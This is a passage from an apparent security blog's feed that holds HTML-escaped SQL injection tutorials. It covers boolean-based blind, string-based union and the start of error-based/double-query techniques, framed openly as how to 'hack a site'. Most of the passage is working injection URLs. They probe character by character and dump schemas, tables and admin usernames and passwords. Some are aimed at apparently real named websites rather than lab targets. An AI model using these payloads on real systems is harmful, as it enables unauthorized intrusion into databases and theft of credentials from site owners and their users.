concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),3,1))=119&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;It loads fine, so now we have “New”.&lt;br&gt;Lets check the last one…&lt;br&gt;The value of “s” is 115, so let’s guess again.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),4,1))=115&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Now we have our “News” table, but how do we know if there’s more characters or not? We can check if the 5th letter’s ascii value is &amp;gt; 0, and if it’s not, it doesn’t exist. So let’s check.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),5,1))&amp;gt;0&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;And the page loads with an error.&lt;/p&gt;
&lt;h2 id=&quot;Step3-Getting-The-Column-Names&quot;&gt;&lt;a href=&quot;#Step3-Getting-The-Column-Names&quot; class=&quot;headerlink&quot; title=&quot;Step3:Getting The Column Names&quot;&gt;&lt;/a&gt;Step3:Getting The Column Names&lt;/h2&gt;&lt;p&gt;Getting the columns is fairly similar to getting the table names, you just add a where clause, and convert your table name to HEX/ASCII characters.&lt;br&gt;Let’s see if our table even has columns first.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),1,1))&amp;gt;0&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Page loads fine, so we have a first character that’s value is more then 0. Now let’s get the column name.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),1,1))&amp;gt;100&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;No errors, let’s go up.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),1,1))&amp;gt;105&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Error, it’s between 100 and 105.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),1,1))=105&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Loads fine, the value of 105 is “i”.&lt;br&gt;Then we repeat the process, until we get our next character.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),2,1))&amp;gt;95&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;No error, let’s try 100.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),2,1))&amp;gt;100&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Error, let’s see if it = 100.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),2,1))=100&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;No error, so now we have “id”. Theres your first column, to get the next one, you’d just increase the limit and start over on your substring() statement.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+1,1),1,1))&amp;gt;0&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h2 id=&quot;Step4-Getting-Data-Out-Of-Columns&quot;&gt;&lt;a href=&quot;#Step4-Getting-Data-Out-Of-Columns&quot; class=&quot;headerlink&quot; title=&quot;Step4:Getting Data Out Of Columns&quot;&gt;&lt;/a&gt;Step4:Getting Data Out Of Columns&lt;/h2&gt;&lt;p&gt;It’s the same process, except we put our column names in a concat statement, FROM the TABLENAME.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))&amp;gt;0&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;So let’s get our first character..&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))&amp;gt;45&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;No error, let’s go up.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))&amp;gt;50&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Error, go back down until you find the right one.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))=49&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Loads fine, and the ascii value of 49 comes back to “1”.&lt;br&gt;Now let’s check if there’s a second character..&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),2,1))&amp;gt;0&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;We get an error, so that was all that was our first result.&lt;/p&gt;
&lt;h2 id=&quot;Conclusion&quot;&gt;&lt;a href=&quot;#Conclusion&quot; class=&quot;headerlink&quot; title=&quot;Conclusion&quot;&gt;&lt;/a&gt;Conclusion&lt;/h2&gt;&lt;p&gt;As you can see, “Blind Injection” doesn’t really have to do with guessing, as long as your site has information_schema. The correct term is actually “Boolean Based Blind Injection”, which makes sense. A Boolean returns a value of true/false, which is what we just went over.  &lt;/p&gt;
&lt;p&gt;Well guys, that’s it. Hope you understand, let me know if you need anything.&lt;br&gt;&lt;br&gt;&lt;/p&gt;
</content>

    <summary type="html">

      &lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;So a lot of people view bling injection as having

    </summary>

      <category term="A-SQLi" scheme="http://sec.php101.cn/categories/A-SQLi/"/>


      <category term="Blind" scheme="http://sec.php101.cn/tags/Blind/"/>

      <category term="Boolean Based" scheme="http://sec.php101.cn/tags/Boolean-Based/"/>

  </entry>

  <entry>
    <title>SQLi--PART V:String Based SQL injection</title>
    <link href="http://sec.php101.cn/2014/11/10/SQLi--PART-VString-Based-SQL-injection/"/>
    <id>http://sec.php101.cn/2014/11/10/SQLi--PART-VString-Based-SQL-injection/</id>
    <published>2014-11-09T18:15:03.000Z</published>
    <updated>2016-03-17T08:39:55.000Z</updated>

    <content type="html">&lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;None&lt;/p&gt;
&lt;h2 id=&quot;What-is-String-Based-SQL-injection-and-how-to-notice-them&quot;&gt;&lt;a href=&quot;#What-is-String-Based-SQL-injection-and-how-to-notice-them&quot; class=&quot;headerlink&quot; title=&quot;What is String Based SQL injection and how to notice them?&quot;&gt;&lt;/a&gt;What is String Based SQL injection and how to notice them?&lt;/h2&gt;&lt;p&gt;To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn’t show us the results needed to be displayed after executing our SQLi query.&lt;br&gt;Common known issues that proves the site being vulnerable to String Based are:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&amp;quot;order by&amp;quot; doesn&amp;apos;t work, example: order by 100--&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;quot;group by&amp;quot; doesn&amp;apos;t work&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;quot;having 1=2&amp;quot; doesn&amp;apos;t work&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;queries related to SQL injection doesn&amp;apos;t work (will show a normal page even though site is vuln to SQLi)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h2 id=&quot;Solution-to-this-issue-in-order-to-hack-a-site-with-String-Based-SQL-injection&quot;&gt;&lt;a href=&quot;#Solution-to-this-issue-in-order-to-hack-a-site-with-String-Based-SQL-injection&quot; class=&quot;headerlink&quot; title=&quot;Solution to this issue in order to hack a site with String Based SQL injection&quot;&gt;&lt;/a&gt;Solution to this issue in order to hack a site with String Based SQL injection&lt;/h2&gt;&lt;p&gt;The answer to this problem is by using the following format while trying to hack a site with SQLi.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://site.com/index.php?id=10&amp;apos; order by 1000--+&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;That will show us the error, hence displaying the results according to our query.&lt;br&gt;The point here is that we used the quote ‘ and the + sign in our query:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;id=X&amp;apos; order by--+&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Alright that you’ve got the point lets try String Based on some of the other types of SQL injection shall we.&lt;/p&gt;
&lt;h2 id=&quot;String-Union-Based-SQL-injection&quot;&gt;&lt;a href=&quot;#String-Union-Based-SQL-injection&quot; class=&quot;headerlink&quot; title=&quot;String-Union Based SQL injection&quot;&gt;&lt;/a&gt;String-Union Based SQL injection&lt;/h2&gt;&lt;p&gt;Step1:Obtaining the number of columns (in this example, we’ll use 10 columns)&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.site.com/index.php?id=234&amp;apos; order by 11--+&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Results show error, so we’ll assume as 10 columns, since it’ll be an example for our process.&lt;/p&gt;
&lt;p&gt;Step2:Obtaining the Databases&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.site.com/index.php?id=-234&amp;apos; UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Results will display the databases on their website&lt;br&gt;&lt;strong&gt;Note: If you don’t know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Step3: Obtaining the Tables from the current Database&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.site.com/index.php?id=-234&amp;apos; UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Results will display the current table names.&lt;br&gt;For this example, we’ll be using the table name: “admin”.  &lt;/p&gt;
&lt;p&gt;Step4: Obtaining Column names from a specific table (which in this example is “admin”)&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.site.com/index.php?id=-234&amp;apos; UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Results will display the column names from the current table&lt;br&gt;To convert plain text to hex, use: &lt;a href=&quot;http://www.swingnote.com/tools/texttohex.php&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.swingnote.com/tools/texttohex.php&lt;/a&gt;.&lt;br&gt;For this example, we’ll use “username” and “password” as our column names.&lt;/p&gt;
&lt;p&gt;Step5: Obtaining Data from Column names&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.site.com/index.php?id=-234&amp;apos; UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Results will display the data given by the columns you have chosen&lt;/p&gt;
&lt;p&gt;This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection.&lt;br&gt;Please refer to my previous tutorials to know more about Error Based and Union Based.&lt;br&gt;&lt;br&gt;&lt;/p&gt;
</content>

    <summary type="html">

      &lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;None&lt;/p&gt;
&lt;h2 id=&quot;What-is-String-Based-SQL-injectio

    </summary>

      <category term="A-SQLi" scheme="http://sec.php101.cn/categories/A-SQLi/"/>


      <category term="MegaSQLi" scheme="http://sec.php101.cn/tags/MegaSQLi/"/>

      <category term="String Based" scheme="http://sec.php101.cn/tags/String-Based/"/>

  </entry>

  <entry>
    <title>SQLi--PART IV:Error Based/Double Query SQL injection</title>
    <link href="http://sec.php101.cn/2014/11/10/SQLi--PART-IVError-BasedDouble-Query-SQL-injection/"/>
    <id>http://sec.php101.cn/2014/11/10/SQLi--PART-IVError-BasedDouble-Query-SQL-injection/</id>
    <published>2014-11-09T17:32:16.000Z</published>
    <updated>2016-03-17T08:39:33.000Z</updated>

    <content type="html">&lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;Alright I’ll make this tutorial as short as possible so that you can understand faster.&lt;/p&gt;
&lt;h2 id=&quot;Understanding-Error-Based-Double-Query&quot;&gt;&lt;a href=&quot;#Understanding-Error-Based-Double-Query&quot; class=&quot;headerlink&quot; title=&quot;Understanding Error Based/Double Query&quot;&gt;&lt;/a&gt;Understanding Error Based/Double Query&lt;/h2&gt;&lt;p&gt;How does Error Base and Double Query work.&lt;br&gt;&lt;strong&gt;Error Based:&lt;/strong&gt;&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information.&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Double Query:&lt;/strong&gt;&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;Basically like Error Based, except that the Error Based Query will be doubled as a single query statement so that we&amp;apos;ll get errors with information in it.&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;I’ll explain further in this tutorial.&lt;br&gt;Anyways, focus on this part of this tutorial:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Error Based IS Double Query&lt;br&gt;Error Based = Double Query (Error based 2x)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;How-do-you-know-you-should-use-Error-Based-Double-Query-Important&quot;&gt;&lt;a href=&quot;#How-do-you-know-you-should-use-Error-Based-Double-Query-Important&quot; class=&quot;headerlink&quot; title=&quot;How do you know you should use Error Based/Double Query? (Important!)&quot;&gt;&lt;/a&gt;How do you know you should use Error Based/Double Query? (Important!)&lt;/h2&gt;&lt;p&gt;This is the most important part of web hacking; the type of injection to use in different situations.&lt;br&gt;You can use Error Based/ Double Query Injections in the following errors you get.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;a. The Used Select Statements Have  Different Number Of Columns.&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;b. Unknown Column 1 or no columns at all (in webpage and page source)&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;c. Error #1604&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Now take note of those errors. You’ll be needing it.&lt;/p&gt;
&lt;h2 id=&quot;Lets-start-with-Error-Based-SQL-injection&quot;&gt;&lt;a href=&quot;#Lets-start-with-Error-Based-SQL-injection&quot; class=&quot;headerlink&quot; title=&quot;Lets start with Error Based SQL injection&quot;&gt;&lt;/a&gt;Lets start with Error Based SQL injection&lt;/h2&gt;&lt;p&gt;Alright for this lesson, we’ll use this site as an example:&lt;code&gt;http://www.aliqbalschools.org.&lt;/code&gt;&lt;/p&gt;
&lt;h3 id=&quot;First-approach-is-knowing-the-version-of-the-database&quot;&gt;&lt;a href=&quot;#First-approach-is-knowing-the-version-of-the-database&quot; class=&quot;headerlink&quot; title=&quot;First approach is knowing the version of the database&quot;&gt;&lt;/a&gt;First approach is knowing the version of the database&lt;/h3&gt;&lt;p&gt;To do that we enter this query after the end of the URLor 1 group by&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
